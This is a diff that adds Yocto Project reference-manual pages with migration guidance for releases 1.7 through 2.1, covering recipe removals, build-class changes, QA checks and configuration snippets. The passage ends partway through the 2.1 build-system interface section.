index 0000000000..5a5151ec1c
--- /dev/null
+++ b/documentation/ref-manual/migration-1.7.rst
@@ -0,0 +1,223 @@
+Moving to the Yocto Project 1.7 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.7 Release from the prior release.
+
+.. _migration-1.7-changes-to-setting-qemu-packageconfig-options:
+
+Changes to Setting QEMU ``PACKAGECONFIG`` Options in ``local.conf``
+-------------------------------------------------------------------
+
+The QEMU recipe now uses a number of
+:term:`PACKAGECONFIG` options to enable various
+optional features. The method used to set defaults for these options
+means that existing ``local.conf`` files will need to be be modified to
+append to ``PACKAGECONFIG`` for ``qemu-native`` and ``nativesdk-qemu``
+instead of setting it. In other words, to enable graphical output for
+QEMU, you should now have these lines in ``local.conf``:
+::
+
+ PACKAGECONFIG_append_pn-qemu-native = " sdl"
+ PACKAGECONFIG_append_pn-nativesdk-qemu = " sdl"
+
+.. _migration-1.7-minimum-git-version:
+
+Minimum Git version
+-------------------
+
+The minimum :ref:`overview-manual/overview-manual-development-environment:git`
+version required on the
+build host is now 1.7.8 because the ``--list`` option is now required by
+BitBake's Git fetcher. As always, if your host distribution does not
+provide a version of Git that meets this requirement, you can use the
+``buildtools-tarball`` that does. See the
+":ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`"
+section for more information.
+
+.. _migration-1.7-autotools-class-changes:
+
+Autotools Class Changes
+-----------------------
+
+The following :ref:`autotools <ref-classes-autotools>` class changes
+occurred:
+
+- *A separate build directory is now used by default:* The
+ ``autotools`` class has been changed to use a directory for building
+ (:term:`B`), which is separate from the source directory
+ (:term:`S`). This is commonly referred to as ``B != S``, or
+ an out-of-tree build.
+
+ If the software being built is already capable of building in a
+ directory separate from the source, you do not need to do anything.
+ However, if the software is not capable of being built in this
+ manner, you will need to either patch the software so that it can
+ build separately, or you will need to change the recipe to inherit
+ the :ref:`autotools-brokensep <ref-classes-autotools>` class
+ instead of the ``autotools`` or ``autotools_stage`` classes.
+
+- The ``--foreign`` option is no longer passed to ``automake`` when
+ running ``autoconf``: This option tells ``automake`` that a
+ particular software package does not follow the GNU standards and
+ therefore should not be expected to distribute certain files such as
+ ``ChangeLog``, ``AUTHORS``, and so forth. Because the majority of
+ upstream software packages already tell ``automake`` to enable
+ foreign mode themselves, the option is mostly superfluous. However,
+ some recipes will need patches for this change. You can easily make
+ the change by patching ``configure.ac`` so that it passes "foreign"
+ to ``AM_INIT_AUTOMAKE()``. See `this
+ commit <http://cgit.openembedded.org/openembedded-core/commit/?id=01943188f85ce6411717fb5bf702d609f55813f2>`__
+ for an example showing how to make the patch.
+
+.. _migration-1.7-binary-configuration-scripts-disabled:
+
+Binary Configuration Scripts Disabled
+-------------------------------------
+
+Some of the core recipes that package binary configuration scripts now
+disable the scripts due to the scripts previously requiring error-prone
+path substitution. Software that links against these libraries using
+these scripts should use the much more robust ``pkg-config`` instead.
+The list of recipes changed in this version (and their configuration
+scripts) is as follows:
+::
+
+ directfb (directfb-config)
+ freetype (freetype-config)
+ gpgme (gpgme-config)
+ libassuan (libassuan-config)
+ libcroco (croco-6.0-config)
+ libgcrypt (libgcrypt-config)
+ libgpg-error (gpg-error-config)
+ libksba (ksba-config)
+ libpcap (pcap-config)
+ libpcre (pcre-config)
+ libpng (libpng-config, libpng16-config)
+ libsdl (sdl-config)
+ libusb-compat (libusb-config)
+ libxml2 (xml2-config)
+ libxslt (xslt-config)
+ ncurses (ncurses-config)
+ neon (neon-config)
+ npth (npth-config)
+ pth (pth-config)
+ taglib (taglib-config)
+
+Additionally, support for ``pkg-config`` has been added to some recipes in the
+previous list in the rare cases where the upstream software package does
+not already provide it.
+
+.. _migration-1.7-glibc-replaces-eglibc:
+
+``eglibc 2.19`` Replaced with ``glibc 2.20``
+--------------------------------------------
+
+Because ``eglibc`` and ``glibc`` were already fairly close, this
+replacement should not require any significant changes to other software
+that links to ``eglibc``. However, there were a number of minor changes
+in ``glibc 2.20`` upstream that could require patching some software
+(e.g. the removal of the ``_BSD_SOURCE`` feature test macro).
+
+``glibc 2.20`` requires version 2.6.32 or greater of the Linux kernel.
+Thus, older kernels will no longer be usable in conjunction with it.
+
+For full details on the changes in ``glibc 2.20``, see the upstream
+release notes
+`here <https://sourceware.org/ml/libc-alpha/2014-09/msg00088.html>`__.
+
+.. _migration-1.7-kernel-module-autoloading:
+
+Kernel Module Autoloading
+-------------------------
+
+The :term:`module_autoload_* <module_autoload>` variable is now
+deprecated and a new
+:term:`KERNEL_MODULE_AUTOLOAD` variable
+should be used instead. Also, :term:`module_conf_* <module_conf>`
+must now be used in conjunction with a new
+:term:`KERNEL_MODULE_PROBECONF` variable.
+The new variables no longer require you to specify the module name as
+part of the variable name. This change not only simplifies usage but
+also allows the values of these variables to be appropriately
+incorporated into task signatures and thus trigger the appropriate tasks
+to re-execute when changed. You should replace any references to
+``module_autoload_*`` with ``KERNEL_MODULE_AUTOLOAD``, and add any
+modules for which ``module_conf_*`` is specified to
+``KERNEL_MODULE_PROBECONF``.
+
+.. _migration-1.7-qa-check-changes:
+
+QA Check Changes
+----------------
+
+The following changes have occurred to the QA check process:
+
+- Additional QA checks ``file-rdeps`` and ``build-deps`` have been
+ added in order to verify that file dependencies are satisfied (e.g.
+ package contains a script requiring ``/bin/bash``) and build-time
+ dependencies are declared, respectively. For more information, please
+ see the ":doc:`ref-qa-checks`" chapter.
+
+- Package QA checks are now performed during a new
+ :ref:`ref-tasks-package_qa` task rather than being
+ part of the :ref:`ref-tasks-package` task. This allows
+ more parallel execution. This change is unlikely to be an issue
+ except for highly customized recipes that disable packaging tasks
+ themselves by marking them as ``noexec``. For those packages, you
+ will need to disable the ``do_package_qa`` task as well.
+
+- Files being overwritten during the
+ :ref:`ref-tasks-populate_sysroot` task now
+ trigger an error instead of a warning. Recipes should not be
+ overwriting files written to the sysroot by other recipes. If you
+ have these types of recipes, you need to alter them so that they do
+ not overwrite these files.
+
+ You might now receive this error after changes in configuration or
+ metadata resulting in orphaned files being left in the sysroot. If
+ you do receive this error, the way to resolve the issue is to delete
+ your :term:`TMPDIR` or to move it out of the way and
+ then re-start the build. Anything that has been fully built up to
+ that point and does not need rebuilding will be restored from the
+ shared state cache and the rest of the build will be able to proceed
+ as normal.
+
+.. _migration-1.7-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- ``x-load``: This recipe has been superseded by U-boot SPL for all
+ Cortex-based TI SoCs. For legacy boards, the ``meta-ti`` layer, which
+ contains a maintained recipe, should be used instead.
+
+- ``ubootchart``: This recipe is obsolete. A ``bootchart2`` recipe has
+ been added to functionally replace it.
+
+- ``linux-yocto 3.4``: Support for the linux-yocto 3.4 kernel has been
+ dropped. Support for the 3.10 and 3.14 kernels remains, while support
+ for version 3.17 has been added.
+
+- ``eglibc`` has been removed in favor of ``glibc``. See the
+ ":ref:`migration-1.7-glibc-replaces-eglibc`" section for more information.
+
+.. _migration-1.7-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous change occurred:
+
+- The build history feature now writes ``build-id.txt`` instead of
+ ``build-id``. Additionally, ``build-id.txt`` now contains the full
+ build header as printed by BitBake upon starting the build. You
+ should manually remove old "build-id" files from your existing build
+ history repositories to avoid confusion. For information on the build
+ history feature, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+ section in the Yocto Project Development Tasks Manual.
+
+
diff --git a/documentation/ref-manual/migration-1.8.rst b/documentation/ref-manual/migration-1.8.rst
new file mode 100644
index 0000000000..d601e6b63b
--- /dev/null
+++ b/documentation/ref-manual/migration-1.8.rst
@@ -0,0 +1,183 @@
+Moving to the Yocto Project 1.8 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.8 Release from the prior release.
+
+.. _migration-1.8-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- ``owl-video``: Functionality replaced by ``gst-player``.
+
+- ``gaku``: Functionality replaced by ``gst-player``.
+
+- ``gnome-desktop``: This recipe is now available in ``meta-gnome`` and
+ is no longer needed.
+
+- ``gsettings-desktop-schemas``: This recipe is now available in
+ ``meta-gnome`` and is no longer needed.
+
+- ``python-argparse``: The ``argparse`` module is already provided in
+ the default Python distribution in a package named
+ ``python-argparse``. Consequently, the separate ``python-argparse``
+ recipe is no longer needed.
+
+- ``telepathy-python, libtelepathy, telepathy-glib, telepathy-idle, telepathy-mission-control``:
+ All these recipes have moved to ``meta-oe`` and are consequently no
+ longer needed by any recipes in OpenEmbedded-Core.
+
+- ``linux-yocto_3.10`` and ``linux-yocto_3.17``: Support for the
+ linux-yocto 3.10 and 3.17 kernels has been dropped. Support for the
+ 3.14 kernel remains, while support for 3.19 kernel has been added.
+
+- ``poky-feed-config-opkg``: This recipe has become obsolete and is no
+ longer needed. Use ``distro-feed-config`` from ``meta-oe`` instead.
+
+- ``libav 0.8.x``: ``libav 9.x`` is now used.
+
+- ``sed-native``: No longer needed. A working version of ``sed`` is
+ expected to be provided by the host distribution.
+
+.. _migration-1.8-bluez:
+
+BlueZ 4.x / 5.x Selection
+-------------------------
+
+Proper built-in support for selecting BlueZ 5.x in preference to the
+default of 4.x now exists. To use BlueZ 5.x, simply add "bluez5" to your
+:term:`DISTRO_FEATURES` value. If you had
+previously added append files (``*.bbappend``) to make this selection,
+you can now remove them.
+
+Additionally, a ``bluetooth`` class has been added to make selection of
+the appropriate bluetooth support within a recipe a little easier. If
+you wish to make use of this class in a recipe, add something such as
+the following: ::
+
+ inherit bluetooth
+ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'bluetooth', '${BLUEZ}', '', d)}"
+ PACKAGECONFIG[bluez4] = "--enable-bluetooth,--disable-bluetooth,bluez4"
+ PACKAGECONFIG[bluez5] = "--enable-bluez5,--disable-bluez5,bluez5"
+
+.. _migration-1.8-kernel-build-changes:
+
+Kernel Build Changes
+--------------------
+
+The kernel build process was changed to place the source in a common
+shared work area and to place build artifacts separately in the source
+code tree. In theory, migration paths have been provided for most common
+usages in kernel recipes but this might not work in all cases. In
+particular, users need to ensure that ``${S}`` (source files) and
+``${B}`` (build artifacts) are used correctly in functions such as
+:ref:`ref-tasks-configure` and
+:ref:`ref-tasks-install`. For kernel recipes that do not
+inherit from ``kernel-yocto`` or include ``linux-yocto.inc``, you might
+wish to refer to the ``linux.inc`` file in the ``meta-oe`` layer for the
+kinds of changes you need to make. For reference, here is the
+`commit <http://cgit.openembedded.org/meta-openembedded/commit/meta-oe/recipes-kernel/linux/linux.inc?id=fc7132ede27ac67669448d3d2845ce7d46c6a1ee>`__
+where the ``linux.inc`` file in ``meta-oe`` was updated.
+
+Recipes that rely on the kernel source code and do not inherit the
+module classes might need to add explicit dependencies on the
+``do_shared_workdir`` kernel task, for example: ::
+
+ do_configure[depends] += "virtual/kernel:do_shared_workdir"
+
+.. _migration-1.8-ssl:
+
+SSL 3.0 is Now Disabled in OpenSSL
+----------------------------------
+
+SSL 3.0 is now disabled when building OpenSSL. Disabling SSL 3.0 avoids
+any lingering instances of the POODLE vulnerability. If you feel you
+must re-enable SSL 3.0, then you can add an append file (``*.bbappend``)
+for the ``openssl`` recipe to remove "-no-ssl3" from
+:term:`EXTRA_OECONF`.
+
+.. _migration-1.8-default-sysroot-poisoning:
+
+Default Sysroot Poisoning
+-------------------------
+
+``gcc's`` default sysroot and include directories are now "poisoned". In
+other words, the sysroot and include directories are being redirected to
+a non-existent location in order to catch when host directories are
+being used due to the correct options not being passed. This poisoning
+applies both to the cross-compiler used within the build and to the
+cross-compiler produced in the SDK.
+
+If this change causes something in the build to fail, it almost
+certainly means the various compiler flags and commands are not being
+passed correctly to the underlying piece of software. In such cases, you
+need to take corrective steps.
+
+.. _migration-1.8-rebuild-improvements:
+
+Rebuild Improvements
+--------------------
+
+Changes have been made to the :ref:`base <ref-classes-base>`,
+:ref:`autotools <ref-classes-autotools>`, and
+:ref:`cmake <ref-classes-cmake>` classes to clean out generated files
+when the :ref:`ref-tasks-configure` task needs to be
+re-executed.
+
+One of the improvements is to attempt to run "make clean" during the
+``do_configure`` task if a ``Makefile`` exists. Some software packages
+do not provide a working clean target within their make files. If you
+have such recipes, you need to set
+:term:`CLEANBROKEN` to "1" within the recipe, for example: ::
+
+ CLEANBROKEN = "1"
+
+.. _migration-1.8-qa-check-and-validation-changes:
+
+QA Check and Validation Changes
+-------------------------------
+
+The following QA Check and Validation Changes have occurred:
+
+- Usage of ``PRINC`` previously triggered a warning. It now triggers an
+ error. You should remove any remaining usage of ``PRINC`` in any
+ recipe or append file.
+
+- An additional QA check has been added to detect usage of ``${D}`` in
+ :term:`FILES` values where :term:`D` values
+ should not be used at all. The same check ensures that ``$D`` is used
+ in ``pkg_preinst/pkg_postinst/pkg_prerm/pkg_postrm`` functions
+ instead of ``${D}``.
+
+- :term:`S` now needs to be set to a valid value within a
+ recipe. If ``S`` is not set in the recipe, the directory is not
+ automatically created. If ``S`` does not point to a directory that
+ exists at the time the :ref:`ref-tasks-unpack` task
+ finishes, a warning will be shown.
+
+- :term:`LICENSE` is now validated for correct
+ formatting of multiple licenses. If the format is invalid (e.g.
+ multiple licenses are specified with no operators to specify how the
+ multiple licenses interact), then a warning will be shown.
+
+.. _migration-1.8-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes have occurred:
+
+- The ``send-error-report`` script now expects a "-s" option to be
+ specified before the server address. This assumes a server address is
+ being specified.
+
+- The ``oe-pkgdata-util`` script now expects a "-p" option to be
+ specified before the ``pkgdata`` directory, which is now optional. If
+ the ``pkgdata`` directory is not specified, the script will run
+ BitBake to query :term:`PKGDATA_DIR` from the
+ build environment.
+
+
diff --git a/documentation/ref-manual/migration-2.0.rst b/documentation/ref-manual/migration-2.0.rst
new file mode 100644
index 0000000000..4eea94887b
--- /dev/null
+++ b/documentation/ref-manual/migration-2.0.rst
@@ -0,0 +1,281 @@
+Moving to the Yocto Project 2.0 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.0 Release from the prior release.
+
+.. _migration-2.0-gcc-5:
+
+GCC 5
+-----
+
+The default compiler is now GCC 5.2. This change has required fixes for
+compilation errors in a number of other recipes.
+
+One important example is a fix for when the Linux kernel freezes at boot
+time on ARM when built with GCC 5. If you are using your own kernel
+recipe or source tree and building for ARM, you will likely need to
+apply this
+`patch <https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit?id=a077224fd35b2f7fbc93f14cf67074fc792fbac2>`__.
+The standard ``linux-yocto`` kernel source tree already has a workaround
+for the same issue.
+
+For further details, see https://gcc.gnu.org/gcc-5/changes.html
+and the porting guide at
+https://gcc.gnu.org/gcc-5/porting_to.html.
+
+Alternatively, you can switch back to GCC 4.9 or 4.8 by setting
+``GCCVERSION`` in your configuration, as follows:
+::
+
+ GCCVERSION = "4.9%"
+
+.. _migration-2.0-Gstreamer-0.10-removed:
+
+Gstreamer 0.10 Removed
+----------------------
+
+Gstreamer 0.10 has been removed in favor of Gstreamer 1.x. As part of
+the change, recipes for Gstreamer 0.10 and related software are now
+located in ``meta-multimedia``. This change results in Qt4 having Phonon
+and Gstreamer support in QtWebkit disabled by default.
+
+.. _migration-2.0-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been moved or removed:
+
+- ``bluez4``: The recipe is obsolete and has been moved due to
+ ``bluez5`` becoming fully integrated. The ``bluez4`` recipe now
+ resides in ``meta-oe``.
+
+- ``gamin``: The recipe is obsolete and has been removed.
+
+- ``gnome-icon-theme``: The recipe's functionally has been replaced by
+ ``adwaita-icon-theme``.
+
+- Gstreamer 0.10 Recipes: Recipes for Gstreamer 0.10 have been removed
+ in favor of the recipes for Gstreamer 1.x.
+
+- ``insserv``: The recipe is obsolete and has been removed.
+
+- ``libunique``: The recipe is no longer used and has been moved to
+ ``meta-oe``.
+
+- ``midori``: The recipe's functionally has been replaced by
+ ``epiphany``.
+
+- ``python-gst``: The recipe is obsolete and has been removed since it
+ only contains bindings for Gstreamer 0.10.
+
+- ``qt-mobility``: The recipe is obsolete and has been removed since it
+ requires ``Gstreamer 0.10``, which has been replaced.
+
+- ``subversion``: All 1.6.x versions of this recipe have been removed.
+
+- ``webkit-gtk``: The older 1.8.3 version of this recipe has been
+ removed in favor of ``webkitgtk``.
+
+.. _migration-2.0-bitbake-datastore-improvements:
+
+BitBake datastore improvements
+------------------------------
+
+The method by which BitBake's datastore handles overrides has changed.
+Overrides are now applied dynamically and ``bb.data.update_data()`` is
+now a no-op. Thus, ``bb.data.update_data()`` is no longer required in
+order to apply the correct overrides. In practice, this change is
+unlikely to require any changes to Metadata. However, these minor
+changes in behavior exist:
+
+- All potential overrides are now visible in the variable history as
+ seen when you run the following:
+ ::
+
+ $ bitbake -e
+
+- ``d.delVar('VARNAME')`` and
+ ``d.setVar('VARNAME', None)`` result in the variable and all
+ of its overrides being cleared out. Before the change, only the
+ non-overridden values were cleared.
+
+.. _migration-2.0-shell-message-function-changes:
+
+Shell Message Function Changes
+------------------------------
+
+The shell versions of the BitBake message functions (i.e. ``bbdebug``,
+``bbnote``, ``bbwarn``, ``bbplain``, ``bberror``, and ``bbfatal``) are
+now connected through to their BitBake equivalents ``bb.debug()``,
+``bb.note()``, ``bb.warn()``, ``bb.plain()``, ``bb.error()``, and
+``bb.fatal()``, respectively. Thus, those message functions that you
+would expect to be printed by the BitBake UI are now actually printed.
+In practice, this change means two things:
+
+- If you now see messages on the console that you did not previously
+ see as a result of this change, you might need to clean up the calls
+ to ``bbwarn``, ``bberror``, and so forth. Or, you might want to
+ simply remove the calls.
+
+- The ``bbfatal`` message function now suppresses the full error log in
+ the UI, which means any calls to ``bbfatal`` where you still wish to
+ see the full error log should be replaced by ``die`` or
+ ``bbfatal_log``.
+
+.. _migration-2.0-extra-development-debug-package-cleanup:
+
+Extra Development/Debug Package Cleanup
+---------------------------------------
+
+The following recipes have had extra ``dev/dbg`` packages removed:
+
+- ``acl``
+
+- ``apmd``
+
+- ``aspell``
+
+- ``attr``
+
+- ``augeas``
+
+- ``bzip2``
+
+- ``cogl``
+
+- ``curl``
+
+- ``elfutils``
+
+- ``gcc-target``
+
+- ``libgcc``
+
+- ``libtool``
+
+- ``libxmu``
+
+- ``opkg``
+
+- ``pciutils``
+
+- ``rpm``
+
+- ``sysfsutils``
+
+- ``tiff``
+
+- ``xz``
+
+All of the above recipes now conform to the standard packaging scheme
+where a single ``-dev``, ``-dbg``, and ``-staticdev`` package exists per
+recipe.
+
+.. _migration-2.0-recipe-maintenance-tracking-data-moved-to-oe-core:
+
+Recipe Maintenance Tracking Data Moved to OE-Core
+-------------------------------------------------
+
+Maintenance tracking data for recipes that was previously part of
+``meta-yocto`` has been moved to :term:`OpenEmbedded-Core (OE-Core)`. The change
+includes ``package_regex.inc`` and ``distro_alias.inc``, which are
+typically enabled when using the ``distrodata`` class. Additionally, the
+contents of ``upstream_tracking.inc`` has now been split out to the
+relevant recipes.
+
+.. _migration-2.0-automatic-stale-sysroot-file-cleanup:
+
+Automatic Stale Sysroot File Cleanup
+------------------------------------
+
+Stale files from recipes that no longer exist in the current
+configuration are now automatically removed from sysroot as well as
+removed from any other place managed by shared state. This automatic
+cleanup means that the build system now properly handles situations such
+as renaming the build system side of recipes, removal of layers from
+``bblayers.conf``, and :term:`DISTRO_FEATURES`
+changes.
+
+Additionally, work directories for old versions of recipes are now
+pruned. If you wish to disable pruning old work directories, you can set
+the following variable in your configuration:
+::
+
+ SSTATE_PRUNE_OBSOLETEWORKDIR = "0"
+
+.. _migration-2.0-linux-yocto-kernel-metadata-repository-now-split-from-source:
+
+``linux-yocto`` Kernel Metadata Repository Now Split from Source
+----------------------------------------------------------------
+
+The ``linux-yocto`` tree has up to now been a combined set of kernel
+changes and configuration (meta) data carried in a single tree. While
+this format is effective at keeping kernel configuration and source
+modifications synchronized, it is not always obvious to developers how
+to manipulate the Metadata as compared to the source.
+
+Metadata processing has now been removed from the
+:ref:`kernel-yocto <ref-classes-kernel-yocto>` class and the external
+Metadata repository ``yocto-kernel-cache``, which has always been used
+to seed the ``linux-yocto`` "meta" branch. This separate ``linux-yocto``
+cache repository is now the primary location for this data. Due to this
+change, ``linux-yocto`` is no longer able to process combined trees.
+Thus, if you need to have your own combined kernel repository, you must
+do the split there as well and update your recipes accordingly. See the
+``meta/recipes-kernel/linux/linux-yocto_4.1.bb`` recipe for an example.
+
+.. _migration-2.0-additional-qa-checks:
+
+Additional QA checks
+--------------------
+
+The following QA checks have been added:
+
+- Added a "host-user-contaminated" check for ownership issues for
+ packaged files outside of ``/home``. The check looks for files that
+ are incorrectly owned by the user that ran BitBake instead of owned
+ by a valid user in the target system.
+
+- Added an "invalid-chars" check for invalid (non-UTF8) characters in
+ recipe metadata variable values (i.e.
+ :term:`DESCRIPTION`,
+ :term:`SUMMARY`, :term:`LICENSE`, and
+ :term:`SECTION`). Some package managers do not support
+ these characters.
+
+- Added an "invalid-packageconfig" check for any options specified in
+ :term:`PACKAGECONFIG` that do not match any
+ ``PACKAGECONFIG`` option defined for the recipe.
+
+.. _migration-2.0-miscellaneous:
+
+Miscellaneous Changes
+---------------------
+
+These additional changes exist:
+
+- ``gtk-update-icon-cache`` has been renamed to ``gtk-icon-utils``.
+
+- The ``tools-profile`` :term:`IMAGE_FEATURES`
+ item as well as its corresponding packagegroup and
+ ``packagegroup-core-tools-profile`` no longer bring in ``oprofile``.
+ Bringing in ``oprofile`` was originally added to aid compilation on
+ resource-constrained targets. However, this aid has not been widely
+ used and is not likely to be used going forward due to the more
+ powerful target platforms and the existence of better
+ cross-compilation tools.
+
+- The :term:`IMAGE_FSTYPES` variable's default
+ value now specifies ``ext4`` instead of ``ext3``.
+
+- All support for the ``PRINC`` variable has been removed.
+
+- The ``packagegroup-core-full-cmdline`` packagegroup no longer brings
+ in ``lighttpd`` due to the fact that bringing in ``lighttpd`` is not
+ really in line with the packagegroup's purpose, which is to add full
+ versions of command-line tools that by default are provided by
+ ``busybox``.
+
+
diff --git a/documentation/ref-manual/migration-2.1.rst b/documentation/ref-manual/migration-2.1.rst
new file mode 100644
index 0000000000..0220221e01
--- /dev/null
+++ b/documentation/ref-manual/migration-2.1.rst
@@ -0,0 +1,436 @@
+Moving to the Yocto Project 2.1 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.1 Release from the prior release.
+
+.. _migration-2.1-variable-expansion-in-python-functions:
+
+Variable Expansion in Python Functions
+--------------------------------------
+
+Variable expressions, such as ``${VARNAME}`` no longer expand
+automatically within Python functions. Suppressing expansion was done to
+allow Python functions to construct shell scripts or other code for
+situations in which you do not want such expressions expanded. For any
+existing code that relies on these expansions, you need to change the
+expansions to expand the value of individual variables through
+``d.getVar()``. To alternatively expand more complex expressions, use
+``d.expand()``.
+
+.. _migration-2.1-overrides-must-now-be-lower-case:
+
+Overrides Must Now be Lower-Case
+--------------------------------
+
+The convention for overrides has always been for them to be lower-case
+characters. This practice is now a requirement as BitBake's datastore
+now assumes lower-case characters in order to give a slight performance
+boost during parsing. In practical terms, this requirement means that
+anything that ends up in :term:`OVERRIDES` must now
+appear in lower-case characters (e.g. values for ``MACHINE``,
+``TARGET_ARCH``, ``DISTRO``, and also recipe names if
+``_pn-``\ recipename overrides are to be effective).
+
+.. _migration-2.1-expand-parameter-to-getvar-and-getvarflag-now-mandatory:
+
+Expand Parameter to ``getVar()`` and ``getVarFlag()`` is Now Mandatory
+----------------------------------------------------------------------
+
+The expand parameter to ``getVar()`` and ``getVarFlag()`` previously
+defaulted to False if not specified. Now, however, no default exists so
+one must be specified. You must change any ``getVar()`` calls that do
+not specify the final expand parameter to calls that do specify the
+parameter. You can run the following ``sed`` command at the base of a
+layer to make this change:
+::
+
+ sed -e 's:\(\.getVar([^,()]*\)):\1, False):g' -i `grep -ril getVar *`
+ sed -e 's:\(\.getVarFlag([^,()]*,[^,()]*\)):\1, False):g' -i `grep -ril getVarFlag *`
+
+.. note::
+
+ The reason for this change is that it prepares the way for changing
+ the default to True in a future Yocto Project release. This future
+ change is a much more sensible default than False. However, the
+ change needs to be made gradually as a sudden change of the default
+ would potentially cause side-effects that would be difficult to
+ detect.
+
+.. _migration-2.1-makefile-environment-changes:
+
+Makefile Environment Changes
+----------------------------
+
+:term:`EXTRA_OEMAKE` now defaults to "" instead of
+"-e MAKEFLAGS=". Setting ``EXTRA_OEMAKE`` to "-e MAKEFLAGS=" by default
+was a historical accident that has required many classes (e.g.
+``autotools``, ``module``) and recipes to override this default in order
+to work with sensible build systems. When upgrading to the release, you
+must edit any recipe that relies upon this old default by either setting
+``EXTRA_OEMAKE`` back to "-e MAKEFLAGS=" or by explicitly setting any
+required variable value overrides using ``EXTRA_OEMAKE``, which is
+typically only needed when a Makefile sets a default value for a
+variable that is inappropriate for cross-compilation using the "="
+operator rather than the "?=" operator.
+
+.. _migration-2.1-libexecdir-reverted-to-prefix-libexec:
+
+``libexecdir`` Reverted to ``${prefix}/libexec``
+------------------------------------------------
+
+The use of ``${libdir}/${BPN}`` as ``libexecdir`` is different as
+compared to all other mainstream distributions, which either uses
+``${prefix}/libexec`` or ``${libdir}``. The use is also contrary to the
+GNU Coding Standards (i.e.
+https://www.gnu.org/prep/standards/html_node/Directory-Variables.html)
+that suggest ``${prefix}/libexec`` and also notes that any
+package-specific nesting should be done by the package itself. Finally,
+having ``libexecdir`` change between recipes makes it very difficult for
+different recipes to invoke binaries that have been installed into
+``libexecdir``. The Filesystem Hierarchy Standard (i.e.
+http://refspecs.linuxfoundation.org/FHS_3.0/fhs/ch04s07.html) now
+recognizes the use of ``${prefix}/libexec/``, giving distributions the
+choice between ``${prefix}/lib`` or ``${prefix}/libexec`` without
+breaking FHS.
+
+.. _migration-2.1-ac-cv-sizeof-off-t-no-longer-cached-in-site-files:
+
+``ac_cv_sizeof_off_t`` is No Longer Cached in Site Files
+--------------------------------------------------------
+
+For recipes inheriting the :ref:`autotools <ref-classes-autotools>`
+class, ``ac_cv_sizeof_off_t`` is no longer cached in the site files for
+``autoconf``. The reason for this change is because the
+``ac_cv_sizeof_off_t`` value is not necessarily static per architecture
+as was previously assumed. Rather, the value changes based on whether
+large file support is enabled. For most software that uses ``autoconf``,
+this change should not be a problem. However, if you have a recipe that
+bypasses the standard :ref:`ref-tasks-configure` task
+from the ``autotools`` class and the software the recipe is building
+uses a very old version of ``autoconf``, the recipe might be incapable
+of determining the correct size of ``off_t`` during ``do_configure``.
+
+The best course of action is to patch the software as necessary to allow
+the default implementation from the ``autotools`` class to work such
+that ``autoreconf`` succeeds and produces a working configure script,
+and to remove the overridden ``do_configure`` task such that the default
+implementation does get used.
+
+.. _migration-2.1-image-generation-split-out-from-filesystem-generation:
+
+Image Generation is Now Split Out from Filesystem Generation
+------------------------------------------------------------
+
+Previously, for image recipes the :ref:`ref-tasks-rootfs`
+task assembled the filesystem and then from that filesystem generated
+images. With this Yocto Project release, image generation is split into
+separate :ref:`ref-tasks-image` tasks for clarity both in
+operation and in the code.
+
+For most cases, this change does not present any problems. However, if
+you have made customizations that directly modify the ``do_rootfs`` task
+or that mention ``do_rootfs``, you might need to update those changes.
+In particular, if you had added any tasks after ``do_rootfs``, you
+should make edits so that those tasks are after the
+:ref:`ref-tasks-image-complete` task rather than
+after ``do_rootfs`` so that the your added tasks run at the correct
+time.
+
+A minor part of this restructuring is that the post-processing
+definitions and functions have been moved from the
+:ref:`image <ref-classes-image>` class to the
+:ref:`rootfs-postcommands <ref-classes-rootfs*>` class. Functionally,
+however, they remain unchanged.
+
+.. _migration-2.1-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed in the 2.1 release:
+
+- ``gcc`` version 4.8: Versions 4.9 and 5.3 remain.
+
+- ``qt4``: All support for Qt 4.x has been moved out to a separate
+ ``meta-qt4`` layer because Qt 4 is no longer supported upstream.
+
+- ``x11vnc``: Moved to the ``meta-oe`` layer.
+
+- ``linux-yocto-3.14``: No longer supported.
+
+- ``linux-yocto-3.19``: No longer supported.
+
+- ``libjpeg``: Replaced by the ``libjpeg-turbo`` recipe.
+
+- ``pth``: Became obsolete.
+
+- ``liboil``: Recipe is no longer needed and has been moved to the
+ ``meta-multimedia`` layer.
+
+- ``gtk-theme-torturer``: Recipe is no longer needed and has been moved
+ to the ``meta-gnome`` layer.
+
+- ``gnome-mime-data``: Recipe is no longer needed and has been moved to
+ the ``meta-gnome`` layer.
+
+- ``udev``: Replaced by the ``eudev`` recipe for compatibility when
+ using ``sysvinit`` with newer kernels.
+
+- ``python-pygtk``: Recipe became obsolete.
+
+- ``adt-installer``: Recipe became obsolete. See the "`ADT
+ Removed <#adt-removed>`__" section for more
+ information.
+
+.. _migration-2.1-class-changes:
+
+Class Changes
+-------------
+
+The following classes have changed:
+
+- ``autotools_stage``: Removed because the
+ :ref:`autotools <ref-classes-autotools>` class now provides its
+ functionality. Recipes that inherited from ``autotools_stage`` should
+ now inherit from ``autotools`` instead.
+
+- ``boot-directdisk``: Merged into the ``image-vm`` class. The
+ ``boot-directdisk`` class was rarely directly used. Consequently,
+ this change should not cause any issues.
+
+- ``bootimg``: Merged into the
+ :ref:`image-live <ref-classes-image-live>` class. The ``bootimg``
+ class was rarely directly used. Consequently, this change should not
+ cause any issues.
+
+- ``packageinfo``: Removed due to its limited use by the Hob UI, which
+ has itself been removed.
+
+.. _migration-2.1-build-system-ui-changes:
+
+Build System User Interface Changes
+-----------------------------------
+
+The following changes have been made to the build system user interface:
+
+- *Hob GTK+-based UI*: Removed because it is unmaintained and based on
+ the outdated GTK+ 2 library. The Toaster web-based UI is much more
+ capable and is actively maintained. See the
+ ":ref:`toaster-manual/toaster-manual-setup-and-use:using the toaster web interface`"
